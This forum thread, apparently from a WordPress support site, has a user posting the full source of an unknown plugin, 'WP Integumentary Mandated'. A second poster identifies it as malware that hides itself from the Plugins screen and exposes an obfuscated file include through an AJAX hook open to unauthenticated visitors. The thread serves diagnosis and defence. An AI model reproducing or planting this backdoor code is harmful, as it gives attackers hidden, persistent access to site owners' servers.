WordPress plugin appeared on its own: WP Integumentary Mandated

[eisolo]

A plugin called WP Integumentary Mandated randomly appeared in my list of plugins, not sure how long ago. It wasn't (and still isn't) activated. Both the 'author' and 'plugin site' links point to wordpress.org/#. Below I'm pasting all that it is. Wtf?

<?php /* Plugin Name: WP Integumentary Mandated Plugin URI: http://wordpress.org/# Description: Official WordPress plugin Author: WordPress Version: 8.0.6 Author URI: http://wordpress.org/# /

function zsg_ucc() { global $wp_list_table;

    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-integumentary-mandated/wp-integumentary-mandated.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }

}

add_action('pre_current_active_plugins', 'zsg_ucc');

function kuy_qow($plugins) { $p = 'wp-integumentary-mandated/wp-integumentary-mandated.php'; if (array_key_exists($p, $plugins)) { unset($plugins[$p]); } return $plugins; }

add_filter('all_plugins', 'kuy_qow');

function gmv($f, $d) { $r = ''; for ($i = 0; $i < strlen($f); $i += 2) { $v = ord($f[$i]) - 65; $b = ord($f[$i + 1]); if ($b > 90) $b -= 6; $s = $v 52 + ($b - 65); $r .= chr($s - $d); } return $r; }

function pun_ajax_handler() { include plugin_dir_path(__FILE__) . gmv('IHJNJZJGJIJIJKJY', 377); wp_die(); }

add_action('wp_ajax_wp-rhs', 'pun_ajax_handler'); add_action('wp_ajax_nopriv_wp-rhs', 'pun_ajax_handler');

[claudiulodro]

Looking at it, it has some code to make itself appear inactive when looking at the Plugins screen but it is almost certainly active.

Judging by the gmv and pun_ajax_handler functions (which are heavily obfuscated), it's malicious and your site got hacked somehow (probably weak user creds or outdated plugins). I recommend running Jetpack Scan or some other WP security scanner.